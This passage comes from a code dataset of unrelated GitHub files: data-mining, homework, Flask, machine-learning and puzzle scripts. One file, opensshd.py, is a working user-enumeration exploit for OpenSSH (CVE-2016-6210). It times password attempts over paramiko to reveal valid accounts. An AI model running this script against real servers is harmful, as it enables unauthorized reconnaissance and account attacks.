'Long', 'group'])\n df.to_csv('../data/output/' + table.name + '.csv')\n\n\ndef main():\n \"\"\"Initialize everything and run the algorithm.\"\"\"\n global distThreshold\n global colocationMap\n global distancePickle\n\n mainStart = time()\n\n if len(sys.argv) < 2:\n print('Please pass the parameters ')\n sys.exit(-1)\n configFile = sys.argv[1]\n\n # Value that determines the neighbor relation\n distThreshold = 0.45\n # Value that determines the prevalence index\n prevIndexThres = 0.80\n # Other configurations\n usePickle = True\n qgisFiles = True\n # Pickle file name\n distancePickle = '../data/pickle/dist45.pickle'\n\n print('######### CONFIGURATION #########')\n print('Distance Threshold: {}'.format(distThreshold))\n print('Prevalence Index: {}'.format(prevIndexThres))\n print('#################################')\n\n featuresFile = readParams(configFile)\n loadmainDF(featuresFile)\n\n if not usePickle:\n createColocationMap(featureMap)\n\n with open(distancePickle, 'wb') as pickleHandle:\n pickle.dump(colocationMap[2], pickleHandle)\n\n colocationMinerAlgo(prevIndexThres)\n print('Colocated Features: {}'.format(coLocations))\n print('Colocation Rules: {}'.format(colocationRules))\n\n print('Total time Taken {}'.format(time()-mainStart))\n\n if qgisFiles:\n createQGISFiles()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shanbhag10/Crime-Predictor-Chicago","sub_path":"scripts/colocationAlgo.py","file_name":"colocationAlgo.py","file_ext":"py","file_size_in_byte":15823,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"4172220615","text":"\n# a = [1,1,1,2,2,2,3,3]\n\n# a = list(set(a))\n# print(a)\n#homework\n#1\n# a_list = [1,5,7,4]\n# print(f'sorted():{sorted(a_list)}')\n# print(f'.sort(): {a_list.sort()}')\n\n# a = [1, 2, 3, 4, 5]\n# b = a\n# a[2] = 5\n# print(a)\n# print(b)\n\n# def duplicated_letters(a_string):\n\n# new_list = list()\n# for i in a_string:\n# if a_string.count(i) > 1:\n# if i in new_list:\n# continue\n# else:\n# new_list.append(i)\n \n# return new_list\n# print(duplicated_letters('apple'))\n# print(duplicated_letters('banana'))\n\n\n# def low_and_up(a):\n# pass\n# new_string = ''\n# for i in range(len(a)):\n# if i % 2==0:\n# new_string += a[i].lower()\n# else:\n# new_string += a[i].upper()\n# return new_string\n\n# print(low_and_up('apple'))\n# print(low_and_up('banana'))\n\n# def lonely(a_list):\n \n# cnt =1\n# while True:\n# #print(f'{a_list[cnt]} == {a_list[cnt-1]}')\n# if cnt == len(a_list)-1:\n \n# if a_list[cnt] == a_list[cnt-1]:\n \n# a_list.pop(cnt-1)\n# break\n \n# elif a_list[cnt] == a_list[cnt-1]:\n# a_list.remove(a_list[cnt])\n \n# cnt =1\n# else : \n# cnt +=1\n \n \n# return a_list\n\n# print(lonely([1, 1, 3, 3, 0, 1, 1])) # => [1, 3, 0, 1]\n# print(lonely([4, 4, 4, 3, 3])) # => [4, 3]\n\ndef my_find(text, alphabet):\n ind = list()\n while True:\n if len(ind) == 0 and text.find(alphabet)==-1:\n return -1\n elif text.find(alphabet) != -1:\n ind.append(text.find(alphabet))\n text = text.strip(alphabet)\n elif text.find(alphabet)==-1:\n break\n return ind\n \nprint(my_find('apple', 'p'))\nprint(my_find('a', 'p'))","repo_name":"Dohyun-Kimm/TIL","sub_path":"Python/06_python_workshop.py","file_name":"06_python_workshop.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74792905088","text":"from flask import Blueprint, jsonify, request\nfrom starter_app.models import User, Shopping_List, db, Ingredient, Ing_Shop, Food_Group\nfrom sqlalchemy.orm import joinedload\nfrom datetime import datetime\n\nlist_routes = Blueprint('lists', __name__)\n\n@list_routes.route('/', methods=[\"GET\"])\ndef index(user_id):\n response = Shopping_List.query.filter(Shopping_List.user_id == user_id).all()\n return { \"user_lists\": [shopping_list.to_dict() for shopping_list in response]}\n\n@list_routes.route('/new', methods=[\"POST\"])\ndef new_list():\n data = request.get_json()\n new_shop_list = Shopping_List(name=data[\"name\"], \n user_id=data[\"user_id\"], \n date=datetime.now())\n db.session.add(new_shop_list)\n db.session.commit()\n new_shop_list = new_shop_list.to_dict()\n return jsonify(new_shop_list)\n \n\n@list_routes.route('/delete/', methods=[\"DELETE\"])\ndef delete_list(list_id):\n list_items = Ing_Shop.query.filter(Ing_Shop.list_id == list_id).all()\n for item in list_items:\n db.session.delete(item)\n list_to_delete = Shopping_List.query.filter(Shopping_List.id == list_id).one()\n db.session.delete(list_to_delete)\n db.session.commit()\n return jsonify('deleted')\n \n\n@list_routes.route('/items/', methods=[\"GET\"])\ndef get_list_items(list_id):\n user_list = Shopping_List.query.filter(Shopping_List.id == list_id).one()\n user_list = user_list.to_dict()\n items = Ing_Shop.query.join(Ingredient, Ing_Shop.ingredient_id == Ingredient.id).add_columns(\n Ingredient.name).add_columns(\n Ingredient.expires_in).add_columns(\n Ingredient.id).options(\n joinedload(Ing_Shop.ingredients)).filter(\n Ing_Shop.list_id == list_id)\n list_items = [{\"id\":item.id, \"expires_in\":expires_in, \"name\":name, \"ingredient_id\": id} for (item, name, expires_in, id) in items]\n return jsonify({\"items\":list_items, \"user_list\":user_list})\n\n\n@list_routes.route('/add', methods=[\"POST\"])\ndef add_list_items():\n data = request.get_json()\n try:\n exists = Ing_Shop.query.filter(\n Ing_Shop.ingredient_id == data[\"itemToAdd\"]).filter(\n Ing_Shop.list_id == data[\"listId\"]).one()\n except:\n new_item = Ing_Shop(list_id=data[\"listId\"], ingredient_id=data[\"itemToAdd\"])\n db.session.add(new_item)\n db.session.commit()\n new_item = new_item.to_dict()\n return jsonify(new_item)\n return jsonify('already exists')\n\n\n@list_routes.route('/search_bar_add', methods=[\"POST\"])\ndef add_search_list_items():\n data = request.get_json()\n poss_ingredient = Ingredient.query.filter(Ingredient.name.ilike(data[\"itemToAdd\"])).one()\n try:\n exists = Ing_Shop.query.filter(\n Ing_Shop.ingredient_id == poss_ingredient.id).filter(\n Ing_Shop.list_id == data[\"listId\"]).one()\n except:\n new_item = Ing_Shop(list_id=data[\"listId\"], ingredient_id=poss_ingredient.id)\n db.session.add(new_item)\n db.session.commit()\n new_item = new_item.to_dict()\n return jsonify(new_item)\n return jsonify('already exists')\n \n\n@list_routes.route('/remove-item', methods=[\"POST\"])\ndef remove_list_items():\n data = request.get_json()\n item_to_remove = Ing_Shop.query.filter(\n Ing_Shop.ingredient_id == data[\"ingredient_id\"]).filter(\n Ing_Shop.list_id == data[\"listId\"]).one() \n db.session.delete(item_to_remove)\n db.session.commit()\n return jsonify('item removed')\n\n\n@list_routes.route('/ingredients', methods=[\"GET\"])\ndef get_ingredients():\n groups = Food_Group.query.all()\n group_list = [item.to_dict() for item in groups]\n items = Ingredient.query.all()\n items_list = [item.to_dict() for item in items]\n return jsonify({\"ingredients\":items_list, \"food_groups\": group_list})\n\n\n@list_routes.route('/groups/', methods=[\"GET\"])\ndef get_ingredients_by_group(group_id):\n items = Ingredient.query.filter(Ingredient.food_group_id == group_id).order_by(Ingredient.name).all()\n items_list = [item.to_dict() for item in items]\n return jsonify(items_list)","repo_name":"jarondegen/whatsinthesauce","sub_path":"starter_app/api/list_routes.py","file_name":"list_routes.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15564120359","text":"\r\nimport paramiko\r\nimport time\r\nimport argparse\r\nimport logging\r\n\r\nfrom multiprocessing import Pool\r\n\r\nlogging.basicConfig()\r\n\r\n\r\nclass Engine(object):\r\n file_path = None\r\n target = ''\r\n userlist = ['root']\r\n calc_times = []\r\n\r\n req_time = 0.0\r\n num_pools = 10\r\n\r\n def __init__(self, target, filepath=None, req_time=0.0):\r\n self.req_time = req_time\r\n self.target = target\r\n self.file_path = filepath\r\n if self.file_path:\r\n self.load_users(filepath)\r\n\r\n def load_users(self, filepath):\r\n data = []\r\n with open(filepath, 'r') as f:\r\n data = f.read().splitlines()\r\n self.userlist = data\r\n\r\n def partition_list(self, p_list):\r\n p_size = len(p_list) / self.num_pools\r\n for i in xrange(0, len(p_list), p_size):\r\n yield p_list[i:i+p_size]\r\n\r\n def execute(self):\r\n\r\n for user in self.userlist:\r\n self.test_with_user(user)\r\n\r\n def test_with_user(self, user):\r\n p = 'A' * 25000\r\n ssh = paramiko.SSHClient()\r\n start_time = time.clock()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n end_time = time.clock()\r\n try:\r\n ssh.connect(self.target, username=user, password=p)\r\n except:\r\n end_time = time.clock()\r\n total = end_time - start_time\r\n self.calc_times.append(total)\r\n avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times)\r\n flag = '*' if total > avg else ''\r\n print('%s:\\t\\t%s\\t%s' % (user, total, flag))\r\n time.sleep(self.req_time)\r\n ssh.close()\r\n\r\n\r\ndef main(ip_addr, filename=None, req_time=0.0):\r\n if ip_addr == '' or not ip_addr:\r\n print('No target IP specified')\r\n return\r\n if filename == '':\r\n filepname = None\r\n engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)\r\n engine.execute()\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 >= version')\r\n parser.add_argument('ip', help='[Required] The IP of the target server')\r\n parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')\r\n parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')\r\n\r\n ip_addr = None\r\n filename = None\r\n req_time = 0.0\r\n args = parser.parse_args()\r\n\r\n if args.ip:\r\n ip_addr = args.ip\r\n if args.userlist:\r\n filename = args.userlist\r\n if args.time:\r\n req_time = float(args.time)\r\n main(ip_addr, filename, req_time)\r\n\r\n\r\n","repo_name":"calebshortt/opensshd_user_enumeration","sub_path":"opensshd.py","file_name":"opensshd.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"6806255167","text":"import tensorflow as tf\nimport cv2\nimport numpy as np\n\n\nclass FaceDetection(object):\n \"\"\"Face Detection to detect the face in an image.\"\"\"\n\n def __init__(self,model_path):\n self._interpreter = tf.contrib.lite.Interpreter(model_path=model_path)\n self._interpreter.allocate_tensors()\n self.input_details = self._interpreter.get_input_details()\n self.output_details = self._interpreter.get_output_details()\n self.input_shape = self.input_details[0]['shape']\n\n def __str__(self):\n return 'Face Detection handler:\\n\\\n input: {}\\n\\\n output: {}'.format(self.input_details, self.output_details)\n\n def __call__(self,\n image):\n \"\"\"Detecting face for an gray image\n\n Args:\n image: numpy array with shape (image_height, image_width)\n\n Returns:\n prob: probability of the return box\n sx: start x\n sy: start y\n ex: end x\n ey: end y\n\n Raises:\n ValueError: if dimension of the iamge is not 2\n \"\"\"\n if len(image.shape) != 2:\n raise ValueError('dimension of the iamge must 2')\n\n org_height, org_width = image.shape\n input_data = cv2.resize(image, (self.input_shape[2], self.input_shape[1]))\n input_data = np.reshape(input_data, (1, self.input_shape[2], self.input_shape[1], 1))\n input_data = input_data.astype(np.float32)\n # input_data = input_data/255.0\n # fill data and inference\n self._interpreter.set_tensor(self.input_details[0]['index'], input_data)\n self._interpreter.invoke()\n\n # get output data\n output_boxes = self._interpreter.get_tensor(self.output_details[0]['index'])\n # ll = self._interpreter.get_tensor(self.output_details[1]['index'])\n # output_classes = self._interpreter.get_tensor(self.output_details[1]['index'])\n # output_scores = self._interpreter.get_tensor(self.output_details[2]['index'])\n # output_nums = self._interpreter.get_tensor(self.output_details[3]['index'])\n #\n # prob = output_scores[0][0]\n # box = output_boxes[0][0]\n #\n # sy = int(org_height * box[0])\n # sx = int(org_width * box[1])\n # ey = int(org_height * box[2])\n # ex = int(org_width * box[3])\n\n return output_boxes\n\ntflite_path = \"tf.tflite\"\nfd = FaceDetection(tflite_path)\nprint(fd)\n# Read image from path\nimage_path = \"test.jpg\"\nimage= cv2.imread(image_path,0)\nimage = image/255.0\n# print(image)\n# image_rgb = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)\n# image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2GRAY)\n\n\n# Predict and get output\noutput_boxes = fd(image)\nprint(output_boxes)\n# print(score,sx,sy,ex,ey)\n#\n# cv2.rectangle(image_rgb, (sx,sy), (ex,ey), (255,0,0), 5)","repo_name":"panguxiaoshen/tiny_yolov3","sub_path":"tensorflow/src/test_tflite.py","file_name":"test_tflite.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"10488297582","text":"import matplotlib as mpl\nimport pprint\nfrom cycler import cycler #color cycler\nimport itertools\n\n#All colors\ncolors = {u\"gcred\" : u\"#BE1818\",\n u\"gcorange\" : u\"#FF9900\",\n u\"gclime\" : u\"#9DCE09\",\n u\"gcgreen\" : u\"#488F38\",\n u\"gcdarkgrey\" : u\"#808080\",\n u\"gcgrey\" : u\"#C0C0C0\",\n u\"gclightgrey\" : u\"#E6E6E6\",\n u\"gcsilver\" : u\"#EFF2F9\",\n u\"gcdarkblue\" : u\"#00006E\",\n u\"gcblue\" : u\"#000099\",\n u\"gcgreyblue\" : u\"#1C3363\",\n u\"gccyan\" : u\"#009999\",\n u\"gcgreycyan\" : u\"#BBE0E3\",\n u\"gcmagenta\" : u\"#9467bd\",\n u\"gcbrown\" : u\"#8c564b\"}\n\n#Colorcycle\ncolorcycle = [\"gcblue\", \"gcred\", \"gcgreen\", \"gcorange\", \"gccyan\",\n \"gcmagenta\", \"gcbrown\", \"gcdarkgrey\"]\nlscycle = ['-', '--', '-.', ':']\nmarkercycle = ['x', '*', 'v', '^']\n\ndef make_colorcycler(iterator=False):\n if iterator:\n return itertools.cycle(colorcycle)\n\n return cycler(color=colorcycle)\n\n\n#Patch matplotlib color palette\nif int(mpl.__version__[0]) < 2:\n mpl.colors.cnames.update(colors)\nelse:\n mpl.colors._colors_full_map.update(colors)\n\n#Update default color palette\n_orig_propcycle = mpl.rcParams[\"axes.prop_cycle\"]\ndef patch_propcycle():\n cycle = (cycler(ls=lscycle)+cycler(marker=markercycle))*cycler(color=colorcycle)\n mpl.rcParams[\"axes.prop_cycle\"] = cycle\npatch_propcycle()\n\n#Restore original colorcycle\ndef restore_propcycle():\n mpl.rcParams[\"axes.prop_cycle\"] = _orig_propcycle\n\n\ndef show_colors():\n #Function to print the GC colors\n pprint.pprint(colors)\n","repo_name":"burneyy/danplotlib","sub_path":"danplotlib/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"75223800770","text":"import os\nimport sys\nimport socket\nimport argparse\n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--tcp_port', help='The TCP port to check', type=int, required=True)\nargs = argparser.parse_args()\n\nexit_status = 0\ntry:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #If we are in WSL, SO_REUSEADDR will not work correctly, allowing to rebind on an unavailable port\n if \"Microsoft\" not in os.uname().release:\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('0.0.0.0', args.tcp_port))\n sock.listen()\nexcept:\n exit_status = -1\nfinally:\n sock.close()\n\nsys.exit(exit_status)\n","repo_name":"data-team-uhn/cards","sub_path":"Utilities/HostConfig/check_tcp_available.py","file_name":"check_tcp_available.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"11938272139","text":"import cifar10\nimport time\n\nfrom ops import *\nfrom skimage.io import imsave\nfrom datetime import timedelta\n\n\nbatch_size = 64\n\n\n\n\ndef read_images():\n cifar10.maybe_download_and_extract()\n images_train, cls_train, labels_train = cifar10.load_training_data()\n\n return images_train\n\n\n\ndef train_gan():\n\n # initializer dataset\n images_train = read_images()\n\n\n # create placehodler variables, number of latent variable for generator is 100\n x_data = tf.placeholder(tf.float32, [None, 32, 32, 3], name='real_data')\n x_random= tf.placeholder(tf.float32, [None, 100], name='random_init')\n is_train = tf.placeholder(tf.bool, name='is_train')\n\n\n # define generator and discriminator\n gen = generator(x_random, is_train=is_train)\n with tf.variable_scope('d_d') as scope:\n d_fake = discriminator(inputs=gen, is_train=is_train)\n scope.reuse_variables()\n d_real = discriminator(inputs=x_data, is_train=is_train)\n\n\n # loss function\n loss_g = loss_function(d_fake, tf.ones_like(d_fake))\n loss_d = loss_function(d_fake, tf.zeros_like(d_fake)) + \\\n loss_function(d_real, tf.ones_like(d_real))\n\n # add summary\n tf.summary.scalar('loss_d', loss_d)\n tf.summary.scalar('loss_g', loss_g)\n\n # retrieve variables\n var_g = [item for item in tf.trainable_variables() if item.name.startswith('g')]\n var_d = [item for item in tf.trainable_variables() if item.name.startswith('d')]\n\n # define optimizer function\n optimizer_d = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(loss_d, var_list=var_d)\n optimizer_g = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(loss_g, var_list=var_g)\n\n # define session\n session = tf.Session()\n session.run(tf.global_variables_initializer())\n\n # add to tensorboard\n writer = tf.summary.FileWriter('Tensorboard')\n writer.add_graph(session.graph)\n merge = tf.summary.merge_all()\n\n t1 = time.time()\n\n # begin training\n for i in range(20001):\n\n # train discriminator\n x = random_batch(images_train, batch_size)\n x_rand = generate_random_samples([batch_size, 100])\n\n for j in range(1):\n session.run(optimizer_d, feed_dict={x_data:x, x_random:x_rand, is_train:True})\n\n # train generator\n for j in range(1):\n session.run(optimizer_g, feed_dict={x_random:x_rand, is_train:True})\n\n # write to tensorboard\n result = session.run(merge, feed_dict={x_data:x, x_random:x_rand, is_train:False})\n writer.add_summary(result, i)\n\n if i%1000 == 0:\n current_loss_d = session.run(loss_d, feed_dict={x_data:x, x_random:x_rand, is_train:False})\n current_loss_g = session.run(loss_g, feed_dict={x_random:x_rand, is_train:False})\n g_images = session.run(gen, feed_dict={x_random:x_rand, is_train:False})\n print('No.{} iteration'.format(i))\n print('Current loss for discriminator: {}'.format(current_loss_d))\n print('Current loss for generator: {}'.format(current_loss_g))\n deprocess_and_save(g_images, i)\n t2 = time.time()\n time_dif = t2 - t1\n print('Time usage: {}...'.format(timedelta(seconds=int(time_dif))))\n print()\n\n\n\n\n# main function for training\ntrain_gan()\n","repo_name":"junming259/DCGANs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35880415385","text":"#!/usr/bin/env python3\nimport itertools\ntext = [int(line) for line in input().split(',')]\ndef intcode(text, inq):\n outq = []\n pc = 0\n def fetch(addr, mode):\n if mode == 0:\n return text[addr]\n elif mode == 1:\n return addr\n else:\n raise ValueError(f'unknown mode {mode}')\n while True:\n op = text[pc]%100\n amode = text[pc]//100%10\n bmode = text[pc]//1000%10\n cmode = text[pc]//10000%10\n if op == 1:\n text[text[pc+3]] = fetch(text[pc+1], amode) + fetch(text[pc+2], bmode)\n pc += 4\n elif op == 2:\n text[text[pc+3]] = fetch(text[pc+1], amode) * fetch(text[pc+2], bmode)\n pc += 4\n elif op == 3:\n text[text[pc+1]] = inq.pop(0)\n pc += 2\n elif op == 4:\n outq.append(fetch(text[pc+1], amode))\n pc += 2\n elif op == 5:\n pc = fetch(text[pc+2], bmode) if fetch(text[pc+1], amode) != 0 else pc+3\n elif op == 6:\n pc = fetch(text[pc+2], bmode) if fetch(text[pc+1], amode) == 0 else pc+3\n elif op == 7:\n text[text[pc+3]] = int(fetch(text[pc+1], amode) < fetch(text[pc+2], bmode))\n pc += 4\n elif op == 8:\n text[text[pc+3]] = int(fetch(text[pc+1], amode) == fetch(text[pc+2], bmode))\n pc += 4\n elif op == 99:\n break\n else:\n raise ValueError(f'unknown op {op} at {pc}')\n return outq\nres = 0\nfor a, b, c, d, e in itertools.permutations(range(5)):\n q = intcode(text.copy(), [a, 0])\n q = intcode(text.copy(), [b, q[0]])\n q = intcode(text.copy(), [c, q[0]])\n q = intcode(text.copy(), [d, q[0]])\n q = intcode(text.copy(), [e, q[0]])\n res = max(res, q[0])\nprint(res)\n","repo_name":"DankRank/aoc","sub_path":"2019/07/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39940077219","text":"import numpy as np\n\n# Input\nA = np.array([[1, 1, 0],\n [3, -1, 2],\n [2, -1, 3]])\n\nx = np.array([1, 0, 0])\nx_plus1 = x\nk=0\nlam = np.nan\n\nwhile np.linalg.norm(x_plus1 - x, 2) > 1e-4 or k == 0:\n x = x_plus1\n k = k+1\n x_plus1 = (A@x)/np.linalg.norm(A@x, 2)\n lam = (x.T@A@x)/(x.T@x)\n\n print(f\"Iterations: {k}\")\n print(f\"Lambda: {lam}\")\n print(f\"x: {x_plus1}\")\n\n#eig comparison\neigVal, eigVec = np.linalg.eig(A)\nmax_value = np.argmax(eigVal)\nprint(\"\\n\")\nprint(\"Max Eigenvalue: \")\nprint(eigVal[max_value])\nprint(\"\\n\")\nprint(\"Corresponding Eigenvector: \")\nprint(eigVec[:,max_value])\nprint(\"\\n\")","repo_name":"jaypi95/ZHAW_Archive","sub_path":"HM1/peterju1_S12_Aufg5.py","file_name":"peterju1_S12_Aufg5.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6737052142","text":"import socket\r\nimport sys\r\n\r\ndef main():\r\n arguments = sys.argv\r\n if len(arguments) != 2:\r\n print(f\"Uso: python clienteUDP.py \")\r\n exit(1)\r\n\r\n host = arguments[1]\r\n port_udp = 5001\r\n\r\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\n while True:\r\n destinatario = input(\"Ingrese el nombre del destinatario (o 'exit' para salir): \")\r\n if destinatario.lower() == 'exit':\r\n break\r\n\r\n message = input(\"Ingrese un mensaje: \")\r\n client_socket.sendto(f\"{destinatario}:{message}\".encode('utf-8'), (host, port_udp))\r\n\r\n # Esperar la respuesta del servidor\r\n try:\r\n response, server_address = client_socket.recvfrom(1024)\r\n print(f\"Respuesta del servidor UDP: {response.decode('utf-8')}\")\r\n except ConnectionResetError:\r\n print(\"Error: La conexión con el servidor UDP fue cerrada de forma inesperada.\")\r\n\r\n # Cerrar la conexión UDP\r\n client_socket.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"eliasDomHer/Actividad_10_Sistemas_Operativos","sub_path":"clienteUDP.py","file_name":"clienteUDP.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22018040990","text":"# Script to convert tcl scripts to python format\nimport os\n\ndef tclToPython(tclfile, pyfile, runname):\n tclfile = os.path.abspath(tclfile)\n\n pyfilePath = pyfile.split('/')\n pyfileDir = '/'.join(pyfilePath[:-1])\n os.chdir(f'/{pyfileDir}')\n\n pyfile = pyfilePath[-1]\n\n runstr = str(runname) + '.'\n with open(tclfile, 'r') as fin:\n with open(pyfile, 'w') as fout:\n lines = fin.readlines()\n prevLine = ''\n for line in lines:\n newline = line\n if 'lappend auto_path $env(PARFLOW_DIR)/bin' in newline:\n newline = 'from parflow import Run\\n'\n\n if 'package require parflow' in newline:\n newline = ''\n\n if 'namespace import Parflow::*' in newline:\n newline = f'{runname} = Run(\"{runname}\", __file__)\\n'\n\n if newline[0:6] == 'pfset ':\n newline = newline.replace('pfset ', runstr)\n newline_subs = newline.split()\n newline_subs[0] = newline_subs[0].replace('-', '_')\n if newline_subs[1][0].isalpha() or newline_subs[1][0] == \"\\\"\":\n newline = newline_subs[0] + ' = ' + \"'\" + ' '.join(newline_subs[1:]) + \"'\" + '\\n'\n newline = newline.replace('-', '_').replace('\\\"', '').replace(\"'False'\", \"False\").replace(\"'True'\", \"True\")\n elif newline_subs[1][0] == '$' and len(newline_subs) == 2:\n newline = newline_subs[0] + ' = ' + newline_subs[1][1:] + '\\n'\n else:\n newline = newline_subs[0] + ' = ' + ' '.join(newline_subs[1:]) + '\\n'\n\n if newline[0:4] == 'set ' and 'runname' not in newline:\n newline = newline.replace('set ', '')\n newline_subs = newline.split()\n if newline_subs[1][0].isalpha():\n newline = newline_subs[0] + ' = ' + \"'\" + ' '.join(newline_subs[1:]) + \"'\" + '\\n'\n else:\n newline = newline_subs[0] + ' = ' + ' '.join(newline_subs[1:]) + '\\n'\n\n # commenting out all lines of code that haven't been edited yet\n if newline[0:1] != '#' and newline[0:1] != '\\n' and newline == line:\n # testing for lines that continue to the next line\n if len(prevLine) >= 2 and prevLine[-2] == \"\\\\\":\n pass\n else:\n newline = '# ' + newline\n\n prevLine = newline\n\n fout.write(newline)\n\n fout.write(f'{runname}.run()\\n')\n\n return\n\n# directory = '/Users/grapp/kw-intern/parflow/tcl_original'\n#\n# for file_name in os.listdir(directory):\n# if file_name.endswith(\".tcl\"):\n# full_name = os.path.join(directory, file_name)\n# tclToPython(full_name, f'Users/grapp/kw-intern/parflow/python/test/raw_converted/{file_name[:-4]}.py', f'{file_name[:-4]}')\n\n\n# tclToPython('/Users/grapp/kw-intern/parflow/tcl_original/richards_box_proctest_vardz.tcl', f'Users/grapp/kw-intern/parflow/python/test/raw_converted/richards_box_proctest_vardz.py', 'richards_box_proctest_vardz')","repo_name":"grapp1/kw-intern","sub_path":"parflow/helper_scripts/tclToPython.py","file_name":"tclToPython.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"70125739009","text":"import pygame\n\nWIDTH, HEIGHT = 700, 700 #pixels #width and hight of window\nROWS, COLS = 8, 8 #number of colmns and rows\nSQUARE_SIZE = WIDTH//COLS #size of the square\n\n #RGB\nRED = (255, 0, 0)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBLUE = (0, 0, 255)\nGREY = (128,128,128)\n\nCROWN = pygame.transform.scale(pygame.image.load('images/king.png'), (40, 25)) #load image of crown and resize","repo_name":"ramii3mad/Checkers-Player-Game","sub_path":"checkers/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32222878791","text":"#input_file = open('input_day5.txt', 'r').readlines()\n\n#slice - visar värden i input_file från element 0 - 8. input_file.index(osv.) för in 9 som slice siffra, \\n är på index 9. \n# vill ej ha med den raden, därav -1. \"Står input_file[0:8]\"\n#crate_lines = input_file[:input_file.index('\\n')-1] \n\n#slice - ta ut att det är 9 kolumner. \n#[:input_file.index('\\n')] tar ut alla värden i kolumn sektionen. Utifrån det urvalet [-1] för att ta ut sista raden (visar 1-9) [-3] för att ta ut 9an som\n#som är 3dje sista värdet\n#number_of_crates = input_file[:input_file.index('\\n')][-1][-3] \n\n#moving_lines = input_file[input_file.index('\\n')+1:]\n\n#for line in moving_lines:\n# amount, source, target = [int(entry) for entry in line.strip().split(' ') if entry.isdigit()]\n\n####### FROM YOUTUBE SOLUTION #####################\n# === source: https://www.youtube.com/watch?v=LvH2DU1bARk ====\n\nwith open('input_day5.txt') as input_file:\n stack_strings, instructions = (i.splitlines() for i in input_file.read().strip('\\n').split('\\n\\n'))\n\n\nstacks = {int(digit):[] for digit in stack_strings[-1].replace(' ', '')} #creates a dicitionary, which contains a list per stack value (1-9)\nindexes = [index for index, values in enumerate(stack_strings[-1])if values != ' ']\n\n\ndef displayStacks():\n for stack in stacks:\n print(stack, stacks[stack])\n\ndef loadStacks():\n for string in stack_strings[:-1]:\n stack_num = 1\n for index in indexes:\n if string[index] != ' ':\n stacks[stack_num].insert(0,string[index])\n stack_num += 1\n\ndef getStackEnds():\n final_string = ''\n for stack in stacks:\n final_string += stacks[stack][-1]\n print(final_string)\n\n\ndef emptyStack():\n for value in stacks:\n stacks[value] = []\n \n\n\n# ==== PART 1 ====\nloadStacks()\n\nfor instruction in instructions:\n moves, source, target = [int(entry) for entry in instruction.strip().split(' ') if entry.isdigit()]\n\n for move in range(moves):\n crate_removed = stacks[source].pop()\n stacks[target].append(crate_removed)\n\n\n#displayStacks()\ngetStackEnds() \n\n # ===== PART 2 =====\n\nemptyStack()\nloadStacks()\n\nfor instruction in instructions:\n moves, source, target = [int(entry) for entry in instruction.strip().split(' ') if entry.isdigit()]\n\n crates_to_remove = stacks[source][-moves:] # finding out which crates to move\n stacks[source] = stacks[source][:-moves] # removing crates\n\n for crate in crates_to_remove:\n stacks[target].append(crate) # adding crates to different stack\n\ndisplayStacks()\ngetStackEnds() \n\n\n","repo_name":"mallindvall/adventofcode2022","sub_path":"AdvC_05.py","file_name":"AdvC_05.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5071735133","text":"\"\"\"\nAdapted from https://github.com/lukemelas/simple-bert\n\"\"\"\n \nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch import Tensor \nfrom torch.nn import functional as F\n\nfrom PIL import Image\n\ndef split_last(x, shape):\n \"split the last dimension to given shape\"\n shape = list(shape)\n assert shape.count(-1) <= 1\n if -1 in shape:\n shape[shape.index(-1)] = int(x.size(-1) / -np.prod(shape))\n return x.view(*x.size()[:-1], *shape)\n\n\ndef 